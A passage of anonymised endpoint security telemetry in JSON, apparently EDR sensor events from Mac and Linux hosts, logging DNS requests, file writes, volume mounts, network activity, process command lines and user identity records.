-{"event_simpleName":"DnsRequest","ContextTimeStamp":"1625677475.806","ConfigStateHash":"1620585913","ContextProcessId":"364977197365370629","DomainName":"jss.dom1.com","ContextThreadId":"0","aip":"208.198.160.35","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"DnsRequestMacV1","id":"ffffffff-1111-11eb-9644-060415b1fd87","EffectiveTransmissionClass":"2","aid":"ffffffff7ecf4e61bba14ca5ac5d17b1","timestamp":"1625677476111","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"28"} 
-{"event_simpleName":"NewScriptWritten","ContextTimeStamp":"1625677504.770","ConfigStateHash":"1620585913","ContextProcessId":"365053504406857894","Size":"0","ContextThreadId":"0","aip":"208.180.129.90","SHA256HashData":"2d9a331f045a9c6b13d45eabe948b5c7dfdc25e1251bff6756fa306581087da9","FileIdentifier":"05000001000000000000000000000000b588050000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewScriptWrittenMacV2","id":"ffffffff-1111-11eb-b3de-06a53f021cc9","EffectiveTransmissionClass":"2","aid":"ffffffffbea440b9aad8b5bf222d303f","timestamp":"1625677540055","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/BitBar/countdown_timer.1s.py"} -{"InterfaceIndex":"186","ConfigBuild":"1007.8.0011611.1","event_simpleName":"LocalIpAddressRemovedIP6","event_platform":"Lin","LocalAddressIP6":"ff88:1:1:ffff:440a:57ff:fe3a:8abc","ConfigStateHash":"1156120155","name":"LocalIpAddressRemovedIP6LinV1","aip":"208.203.151.21","id":"ffffffff-1111-11eb-b3c1-02ff598b7945","aid":"ffffffffbfbf4ff5aa56a26ad3c1a942","timestamp":"1625677526386","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"DirectoryCreate","ContextTimeStamp":"1625677499.994","GID":"0","ConfigStateHash":"3090255842","ContextProcessId":"365053555029062046","ContextThreadId":"0","aip":"208.130.71.241","Flags":"0","ConfigBuild":"1007.4.0013701.1","UID":"0","event_platform":"Mac","UnixMode":"0","Entitlements":"15","name":"DirectoryCreateMacV1","id":"ffffffff-1111-11eb-92d2-0286f570f8e1","VnodeType":"2","EffectiveTransmissionClass":"2","aid":"ffffffff24db47799d1a85aae61dc7bc","TargetDirectoryName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871","timestamp":"1625677500089","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/s8/9c47txv13vj8qx_m7cqtx2w80000gp/T/.LINKS/2F71C2D4-D215-453E-BF4C-D6C037502871"} 
-{"LocalAddressIP4":"208.210.109.249","event_simpleName":"NetworkCloseIP4","ContextTimeStamp":"1625677517.658","ConfigStateHash":"1479784503","ConnectionFlags":"0","ContextProcessId":"84424232977619","RemotePort":"443","aip":"208.233.129.250","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"40394","Entitlements":"15","name":"NetworkCloseIP4LinV6","id":"ffffffff-1111-11eb-9015-02e89cda7d5f","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff58de4e748d9f64c85a9b49e6","RemoteAddressIP4":"208.216.236.59","ConnectionDirection":"2","InContext":"0","timestamp":"1625677517986","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"VolumeMediaName":"AppleAPFSMedia","VolumeDeviceProtocol":"PCI-Express","VolumeDeviceVendor":"","ContextThreadId":"0","VolumeMediaContent":"41504653-0000-11AA-AA11-00306543ECAC","VolumeMediaEjectable":"0","aip":"208.93.153.49","VolumeAppearanceTime":"1625677422.647","VolumeDeviceModel":"APPLE SSD SM0256L","VolumeMediaBSDName":"disk1s3","VolumeMountPoint":"/Volumes/Recovery","event_platform":"Mac","VolumeType":"APFS","VolumeMediaRemovable":"0","VolumeMediaBSDUnit":"1","VolumeFileSystemDriver":"apfs","id":"ffffffff-1111-11eb-956a-02748d01bd3d","VolumeMediaSize":"250685575168","EffectiveTransmissionClass":"2","VolumeBusName":"IONVMeController","timestamp":"1625677496804","VolumeMediaBSDMinor":"8","VolumeMediaWritable":"1","event_simpleName":"FsVolumeMounted","VolumeDevicePath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1","VolumeName":"Recovery","ContextTimeStamp":"1625677496.750","VolumeSectorSize":"4096","ConfigStateHash":"3090255842","ContextProcessId":"365053546767850587","VolumeBusPath":"IODeviceTree:/PCI0@0/RP01@1C/SSD0@0/IONVMeController","VolumeDeviceInternal":"1","ConfigBuild":"1007.4.0013701.1","VolumeUUID":"85400FAD-01F9-0442-8C5D-441F365D4909","VolumeDeviceRevision":"CXS4LA0Q","Entitlements":"15","name":"FsVolumeMountedMacV1","VolumeMediaBSDMaj
or":"1","VolumeMediaPath":"IOService:/AppleACPIPlatformExpert/PCI0@0/AppleACPIPCI/RP01@1C/IOPP/SSD0@0/IONVMeController/IONVMeBlockStorageDevice@1/IOBlockStorageDriver/APPLE SSD SM0256L Media/IOGUIDPartitionScheme/NoName@2/AppleAPFSContainerScheme/AppleAPFSMedia/AppleAPFSContainer/Recovery@3","aid":"ffffffff8eca418b7a861be9c5f7de1d","VolumeMediaUUID":"AD0F4085-F901-4204-8C5D-441F365D4909","VolumeMediaWhole":"0","cid":"ffffffff15754bcfb5f9152ec7ac90ac","VolumeIsNetwork":"0"} -{"LocalAddressIP4":"208.30.117.28","event_simpleName":"LocalIpAddressIP4","ConfigStateHash":"1156120155","CreationTimeStamp":"1625677513.841","aip":"208.233.54.217","PhysicalAddress":"0e-d6-ff-ff-ff-63","InterfaceAlias":"eth0","InterfaceIndex":"2","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","InterfaceType":"1","name":"LocalIpAddressIP4LinV1","id":"ffffffff-1111-11eb-9c94-0222a21bbb27","PhysicalAddressLength":"6","aid":"ffffffff190e436aaebc3892bcda5beb","timestamp":"1625677514374","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"LocalIpAddressRemovedIP6","LocalAddressIP6":"ff88:1:1:ffff:442a:7bff:fe75:9ed","ConfigStateHash":"3967242894","aip":"208.165.30.176","InterfaceIndex":"8","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressRemovedIP6MacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"OutOctets":"0","CreationTimeStamp":"","aip":"208.176.144.39","OutMulticastPkts":"0","InErrors":"0","InterfaceAlias":"llw0","InDiscards":"0","InterfaceIndex":"8","event_platform":"Mac","InterfaceType":"6","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","PhysicalAddressLength":"6","InUcastPkts":"0","EffectiveTransmissionClass":"2","timestamp":"1625677521723","event_simpleName":"LocalIpAddressIP6","LocalAddressIP6":"ff88:1:1:ffff:c027:b0ff:fe27:830f","ConfigStateHash":"1620585913","PhysicalAddress":"c2-27-b0-27-83-0f","OutErrors":"0","InUnknownProtos":"0","OutUcastPkts":"0","InMulticastPkts":"0","ConfigBuild":"1007.4.0013701.1","InOctets":"0","NetLuidIndex":"0","Entitlements":"15","name":"LocalIpAddressIP6MacV1","aid":"ffffffff0ad7494e8e817b3903f4eebb","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"LocalAddressIP4":"0.0.0.0","event_simpleName":"NetworkListenIP4","ContextTimeStamp":"1625677507.037","ConfigStateHash":"3090255842","ConnectionFlags":"0","ContextProcessId":"364432308748445743","RemotePort":"0","aip":"208.98.120.25","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"50647","Entitlements":"15","name":"NetworkListenIP4MacV10","id":"ffffffff-1111-11eb-8b36-06a8af5164a9","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff23d24c4193ffa6f270775ee5","RemoteAddressIP4":"0.0.0.0","ConnectionDirection":"2","InContext":"0","timestamp":"1625677507086","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"ExecutableDeleted","ContextTimeStamp":"1625677536.729","ConfigStateHash":"3090255842","ContextProcessId":"364994904864288322","ContextThreadId":"0","aip":"208.31.216.39","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ExecutableDeletedMacV1","id":"ffffffff-1111-11eb-8ca0-0231588e8cbb","EffectiveTransmissionClass":"2","aid":"ffffffffa7bf46da689501ce58bd6987","timestamp":"1625677536784","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Users/user3/Library/Caches/com.tinyspeck.slackmacgap.ShipIt/update.FXKsmFO/Slack.app/Contents/Frameworks/Squirrel.framework/Versions/A/Resources/ShipIt"} -{"event_simpleName":"GzipFileWritten","ContextTimeStamp":"1625677504.542","ConfigStateHash":"3090255842","ContextProcessId":"362897421906895953","ContextThreadId":"0","aip":"208.188.8.87","FileIdentifier":"04000001000000000000000000000000501f510700000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GzipFileWrittenMacV1","id":"ffffffff-1111-11eb-9320-06d410e6f705","EffectiveTransmissionClass":"2","aid":"fffffffffc2c4e4fa9c08e1a8388e5f9","timestamp":"1625677504614","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/db/powerlog/Library/BatteryLife/Archives/powerlog_2021-07-05_CC5F9FC1.PLSQL.gz"} -{"event_simpleName":"IOServiceRegister","ContextTimeStamp":"1625622770.595","ConfigStateHash":"3967242894","aip":"208.165.30.176","IOServiceClass":"IOUSBDevice:IOUSBNub:IOService:IORegistryEntry:OSObject","ConfigBuild":"1007.4.0013701.1","IOServicePath":"IOService:/IOResources/AppleUSBHostResources/AppleUSBLegacyRoot/AppleUSBVHCIBCE@80000000/Touch Bar Backlight@80700000","event_platform":"Mac","IOServiceProperties":"","Entitlements":"15","name":"IOServiceRegisterMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","IOServiceName":"Touch Bar 
Backlight","timestamp":"1625677480056","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"PtyCreated","ContextTimeStamp":"1625622602.031","ConfigStateHash":"3967242894","ContextProcessId":"364938416497226937","DeviceId":"251658248","ContextThreadId":"0","aip":"208.165.30.176","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PtyCreatedMacV1","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677478739","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"LocalAddressIP4":"208.27.233.142","event_simpleName":"LocalIpAddressRemovedIP4","ConfigStateHash":"1803419442","aip":"208.69.76.234","InterfaceIndex":"18","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","NetLuidIndex":"2","Entitlements":"15","name":"LocalIpAddressRemovedIP4MacV1","id":"ffffffff-1111-11eb-b7b7-066cc89bcebf","EffectiveTransmissionClass":"2","aid":"ffffffff5ae3449ab33a1809fe6c5ce2","timestamp":"1625677475967","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"NetworkCloseIP6","ContextTimeStamp":"1625677474.875","LocalAddressIP6":"0:0:0:0:0:0:0:1","RemoteAddressIP6":"0:0:0:0:0:0:0:1","ConfigStateHash":"1701000200","ConnectionFlags":"0","ContextProcessId":"12241681491990","RemotePort":"9","aip":"208.144.51.215","ConfigBuild":"1007.8.0011308.1","event_platform":"Lin","LocalPort":"59999","Entitlements":"15","name":"NetworkCloseIP6LinV6","id":"ffffffff-1111-11eb-8130-02cde7751097","Protocol":"17","EffectiveTransmissionClass":"3","aid":"ffffffff335f47ca89cad6a19f203bbd","ConnectionDirection":"2","InContext":"0","timestamp":"1625677475413","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"ConfigBuild":"1007.8.0011611.1","event_simpleName":"ConfigStateUpdate","event_platform":"Lin","ConfigStateHash":"1156120155","ConfigStateData":"0,0,1007.8.0011611.1|1,c,0|1,22,6|1,59,2d|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|","name":"ConfigStateUpdateLinV2","aip":"208.203.151.21","id":"ffffffff-1111-11eb-af89-06c111484f9f","aid":"ffffffffa74a4c89b9984a3a7124bb9d","timestamp":"1625677490580","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"SuspiciousDnsRequest","ContextTimeStamp":"1625677493.531","ConfigStateHash":"3090255842","ContextProcessId":"364839648316192383","DomainName":"hg-t2.dotice.me","ContextThreadId":"0","aip":"208.141.219.156","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"SuspiciousDnsRequestMacV1","id":"ffffffff-1111-11eb-a4a3-02cbdfb8f529","EffectiveTransmissionClass":"2","aid":"ffffffff0cd64fb78626ab1b6c65ac8c","timestamp":"1625677493756","cid":"ffffffff15754bcfb5f9152ec7ac90ac","RequestType":"1"} -{"Parameter2":"0","event_simpleName":"ErrorEvent","Parameter1":"18446744072635810412","Parameter3":"0","ConfigStateHash":"1156120155","aip":"208.233.54.217","Line":"96","ConfigBuild":"1007.8.0011611.1","event_platform":"Lin","ErrorStatus":"3759276032","name":"ErrorEventLinV1","id":"ffffffff-1111-11eb-bdd3-0681aa29cecb","Facility":"16778240","aid":"ffffffffabd047b1a86c1fcd8ef22b59","File":"0","timestamp":"1625677530922","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"ConfigStateUpdate","ConfigStateHash":"3090255842","ConfigStateData":"0,0,1007.4.0013701.1|1,2,1|1,4,a|1,6,0|1,8,46|1,a,1|1,c,0|1,17,1f|1,18,18|1,19,0|1,1e,407|1,21,3d2|1,27,1|1,53,18b|1,56,0|1,d0,16d|1,d1,0|1,d2,0|1,df,4c|1,e0,6|1,f6,1|1,1f5,1|1,1f7,1|1,1fd,1|1,200,0|2,0,138,a8000000032,140000000085,140000000153,18000000004c,18000000004f,180000000050,180000000051,180000000054,1800000000e1,1800000000e7,180000000144,18000000014e,18000000015a,18000000020e,180000000226,180000000227,180400000079,18040000009b,18040000009c,1804000000ff,180400000117,180400000118,180400000142,180400000163,180400000164,180400000166,180400000167,1804000001b2,1804000001f2,1804000001f3,180400000225,1804000002be,1804000002bf,1804000002ca,1804000002cb,1808000000c9,1808000000ee,1808000000fc,1808000000fd,1808000000fe,180c0000016b,180c0000016c,180c0000016d,180c0000016e,180c0000016f,180c00000170,180c000001b6,180c000001b7,180c000001b8,180c000001b9,180c000001f6,180c000001f7,180c000001f8,180c000002c2,180c000002c3,180c000002c4,180c000002ce,180c000002cf,180c000002d0,18100000011e,18100000011f,181000000120,181000000121,181000000122,181000000123,181000000124,181000000125,181000000126,181000000128,181000000169,18100000016a,181000000180,1810000001b1,1810000001c3,18100000021f,181000000220,18100000024e,18100000025b,181000000280,1810000002ad,1810000002d6,1810000002d7,1810000002f3,1c04000000a1,1c04000000a2,1c04000000a3,1c04000000a4,1c04000000a5,1c04000000a6,1c040000011a,1c040000011b,1c040000011c,1c0400000268,1c0400000269,1c040000026a,1c040000026c,1c040000026d,1c040000026e,1c0400000271,1c0400000272,1c0400000273,1c0400000275,1c0400000276,1c0400000277,1c040000028f,1c0400000290,1c0400000291,1c0400000293,1c0400000294,1c0400000295,1c0400000297,1c0400000298,1c0400000299,1c040000029b,1c040000029c,1c040000029d,1c040000029f,1c04000002a0|3,0,65|","aip":"208.24.60.146","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"ConfigStateUpdateMacV2","id":"ffffffff-1111-11eb-8dc4-
0234c12f9875","EffectiveTransmissionClass":"0","aid":"ffffffffa15a452190ae454f7d33e07e","timestamp":"1625677530590","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"KextLoad","ContextTimeStamp":"1625677509.064","ConfigStateHash":"1620585913","ContextProcessId":"364867547408058681","ContextThreadId":"0","aip":"208.131.106.21","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","BundleID":"com.apple.driver.AudioAUUC","Entitlements":"15","name":"KextLoadMacV1","id":"ffffffff-1111-11eb-a2ae-028f6bf89be7","EffectiveTransmissionClass":"2","aid":"ffffffffaa0e47a1b009aef151d6179d","timestamp":"1625677509069","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"ChannelVersion":"25","event_simpleName":"ChannelVersionRequired","ConfigStateHash":"3155796140","aip":"208.27.17.203","ChannelVersionRequired":"0","ChannelId":"20","ConfigBuild":"1007.8.0011110.1","event_platform":"Lin","name":"ChannelVersionRequiredLinV1","id":"ffffffff-1111-11eb-b411-06baeacb7a63","aid":"ffffffff67d54f7daf3d998ffc74d48e","timestamp":"1625677507901","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"ProcessRollup2Stats","ConfigStateHash":"2037712541","Timeout":"60","ParentProcessId":"0","aip":"208.203.151.21","SuppressType":"3","SHA256HashData":"64e48365207d0c19008ba7d53d75c0de3fcd5a1590e4c40fc69c677663fedc20","ProcessCount":"60","BoundedCount":"57","ConfigBuild":"1007.8.0011308.1","UID":"115","event_platform":"Lin","CommandLine":"sh -c \"/usr/lib/erlang/erts-11.1.3/bin/epmd\" -daemon","Entitlements":"15","name":"ProcessRollup2StatsLinV3","id":"ffffffff-1111-11eb-b34e-063f4cefccb3","EffectiveTransmissionClass":"2","aid":"ffffffffe22549479fbe8293b6747a68","timestamp":"1625677511754","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"UserIdentity","LoginSessionId":"1138166333440","AuthenticationUuidAsString":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","UserName":"user1","ConfigStateHash":"3967242894","aip":"208.165.30.176","AuthenticationId":"265","UserPrincipal":"user1@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1530","ConfigBuild":"1007.4.0013701.1","UID":"265","event_platform":"Mac","Entitlements":"15","name":"UserIdentityMacV4","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"FFFFEEEE-DDDD-CCCC-BBBB-AAAA00000109","timestamp":"1625677478122","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"FeatureVector":"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","event_simpleName":"DeliverLocalFXToCloud","ConfigStateHash":"1620585913","aip":"208.237.139.168","ModelPrediction":"1436899696705536","SHA256HashData":"c89caf538788e6524bf4ae93194051f3389eecbc71e4793f12a2dc0368211cc2","Malicious":"0","ConfigBuild":"1007.4.0013701.1","FeatureExtractionVersion":"2","event_platform":"Mac","FXFileSize":"502032","Entitlements":"15","name":"DeliverLocalFXToCloudMacV4","PupAdwareDecisionValue":"12384657383358464","id":"ffffffff-1111-11eb-b44e-069a02b0ad6b","PupAdwareConfidence":"0","EffectiveTransmissionClass":"1","aid":"ffffffff45d647e6ae0ba8764a4bd570","MLModelVersion":"4","timestamp":"1625677489052","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"CreateProcessArgs","ContextTimeStamp":"1625677524.929","ConfigStateHash":"3090255842","ContextProcessId":"365035560818271291","ContextThreadId":"365035560818271291","aip":"208.114.159.32","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","CommandLine":"t.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/CategorySurfaceViewController.o -o 
/Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationActionView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationAddressView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationErrorView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationHeaderView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationLoadingView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationPostalCodeView.o -o /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Build/Intermediates.noindex/Instacart.build/Debug-iphonesimulator/Carrot.build/Objects-normal/x86_64/ChangeLocationViewController.o -index-store-path /Users/user4/Library/Developer/Xcode/DerivedData/Instacart-ceioektzbmfzbcgtsioovgzlzmnt/Index/DataStore 
-index-system-modules","Entitlements":"15","name":"CreateProcessArgsMac","id":"ffffffff-1111-11eb-8332-020506b18db5","EffectiveTransmissionClass":"2","aid":"ffffffffb3a3442585c05abc61e290fc","timestamp":"1625677525128","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/bin/swift-frontend"} -{"event_simpleName":"PdfFileWritten","ContextTimeStamp":"1625677488.523","ConfigStateHash":"3090255842","ContextProcessId":"364156540965623394","ContextThreadId":"0","aip":"208.15.11.8","FileIdentifier":"05000001000000000000000000000000f1321d0000000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"PdfFileWrittenMacV1","id":"ffffffff-1111-11eb-8903-022a1941b91f","EffectiveTransmissionClass":"2","aid":"ffffffffc4044541995bffd84b9df003","timestamp":"1625677488576","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/pt/s9pzbbwd07q_0fxqvfhc513r0000gp/T/com.microsoft.Excel/Content.MSO/mso6ACABA95"} -{"event_simpleName":"GroupIdentity","GID":"242","AuthenticationUuidAsString":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","ConfigStateHash":"3967242894","aip":"208.165.30.176","AuthenticationId":"1119489580471877843","UserPrincipal":"user2@dom1","UserSid":"S-1-5-21-3852557355-3178143607-2040168074-1485","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"GroupIdentityMacV2","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","AuthenticationUuid":"ABCDEFAB-CDEF-ABCD-EFAB-CDEF000000F2","timestamp":"1625677478379","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"MachOFileWritten","ContextTimeStamp":"1625622611.845","ConfigStateHash":"3967242894","MachOSubType":"3","ContextProcessId":"364938429384226082","Size":"0","ContextThreadId":"0","aip":"208.165.30.176","SHA256HashData":"c0f50d27fe9fb31e33d1ce6577eeb4d4e17639095ad20575da018d1fcf955198","FileIdentifier":"04000001000000000000000000000000ac41270400000000","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"MachOFileWrittenMacV3","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","EffectiveTransmissionClass":"2","aid":"ffffffff44564c2f8d76394cb25c31ab","timestamp":"1625677479336","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/bf/dwpvdj3d1tq00l8fgs5rd7x00000gn/T/.net.example.desktop.ev80yl"} -{"event_simpleName":"NetworkListenIP6","ContextTimeStamp":"1625622608.014","LocalAddressIP6":"0:0:0:0:0:0:0:0","RemoteAddressIP6":"0:0:0:0:0:0:0:0","ConfigStateHash":"3967242894","ConnectionFlags":"0","ContextProcessId":"364938390018585510","RemotePort":"0","aip":"208.165.30.176","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","LocalPort":"8770","Entitlements":"15","name":"NetworkListenIP6MacV10","id":"ffffffff-1111-11eb-9dc2-029257dbe83b","Protocol":"6","EffectiveTransmissionClass":"3","aid":"ffffffff44564c2f8d76394cb25c31ab","ConnectionDirection":"2","InContext":"0","timestamp":"1625677478929","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} -{"event_simpleName":"CurrentSystemTags","ConfigStateHash":"3090255842","aip":"208.87.57.118","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","SystemTableIndex":"0","Entitlements":"15","name":"CurrentSystemTagsMacV1","id":"ffffffff-1111-11eb-b88d-06b7cb0d7bd7","EffectiveTransmissionClass":"0","aid":"ffffffff62714a708030d494ca0a7e60","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 
26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 26439818674540, 26439818674541, 26439818674542, 26439818674543, 26439818674544, 26439818674614, 26439818674615, 26439818674616, 26439818674617, 26439818674678, 26439818674679, 26439818674680, 26439818674882, 26439818674883, 26439818674884, 26439818674894, 26439818674895, 26439818674896, 26456998543646, 26456998543647, 26456998543648, 26456998543649, 26456998543650, 26456998543651, 26456998543652, 26456998543653, 26456998543654, 26456998543656, 26456998543721, 26456998543722, 26456998543744, 26456998543793, 26456998543811, 26456998543903, 26456998543904, 26456998543950, 26456998543963, 26456998544000, 26456998544045, 26456998544086, 26456998544087, 26456998544115, 30803505447073, 30803505447074, 30803505447075, 30803505447076, 30803505447077, 30803505447078, 30803505447194, 30803505447195, 30803505447196, 30803505447528, 30803505447529, 30803505447530, 30803505447532, 30803505447533, 30803505447534, 30803505447537, 30803505447538, 30803505447539, 30803505447541, 30803505447542, 30803505447543, 30803505447567, 30803505447568, 30803505447569, 30803505447571, 30803505447572, 30803505447573, 30803505447575, 30803505447576, 30803505447577, 30803505447579, 30803505447580, 30803505447581, 30803505447583, 30803505447584","timestamp":"1625677502693","cid":"ffffffff15754bcfb5f9152ec7ac90ac"} 
-{"event_simpleName":"NewExecutableWritten","ContextTimeStamp":"1625677533.027","ConfigStateHash":"1620585913","ContextProcessId":"362208380891022165","Size":"596224","ContextThreadId":"0","aip":"208.24.116.10","SHA256HashData":"70a06a11057efb22285a7200a53e5b6bae001fe0a98d4b23d0f6a31ad818a005","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"NewExecutableWrittenMacV2","id":"ffffffff-1111-11eb-985c-02152dd35bc1","EffectiveTransmissionClass":"2","aid":"ffffffff28414c2293e35c360213e723","timestamp":"1625677533060","cid":"ffffffff15754bcfb5f9152ec7ac90ac","TargetFileName":"/private/var/folders/3c/z7j1h7dx3nz3xkl10c1vyxgh0000gp/T/.com.google.Chrome.CVG7Ya/Zoom.app/Contents/MacOS/app_mode_loader","VnodeModificationType":"0"} -{"event_simpleName":"LfoUploadDataComplete","LfoUploadFlags":"4","AttemptNumber":"0","ConfigStateHash":"3090255842","SourceFileName":"/Users/user5/.rbenv/versions/2.6.5/bin/ruby","Size":"3876424","aip":"208.137.65.223","SHA256HashData":"d7b56e2a06304ecd343985a1aaedff2eb32ee1151bba0e152aff97c778b7562a","UploadId":"8023668629276690295","ConfigBuild":"1007.4.0013701.1","event_platform":"Mac","Entitlements":"15","name":"LfoUploadDataCompleteMacV3","id":"ffffffff-1111-11eb-a2ab-024aafff599f","EffectiveTransmissionClass":"2","aid":"fffffffffbea48169985c2c2bae89d1d","Tags":"312, 11544872091698, 21990232555653, 21990232555859, 26388279066700, 26388279066703, 26388279066704, 26388279066705, 26388279066708, 26388279066849, 26388279066855, 26388279066948, 26388279066958, 26388279066970, 26388279067150, 26388279067174, 26388279067175, 26405458935929, 26405458935963, 26405458935964, 26405458936063, 26405458936087, 26405458936088, 26405458936130, 26405458936163, 26405458936164, 26405458936166, 26405458936167, 26405458936242, 26405458936306, 26405458936307, 26405458936357, 26405458936510, 26405458936511, 26405458936522, 26405458936523, 26422638805193, 26422638805230, 26422638805244, 26422638805245, 26422638805246, 26439818674539, 
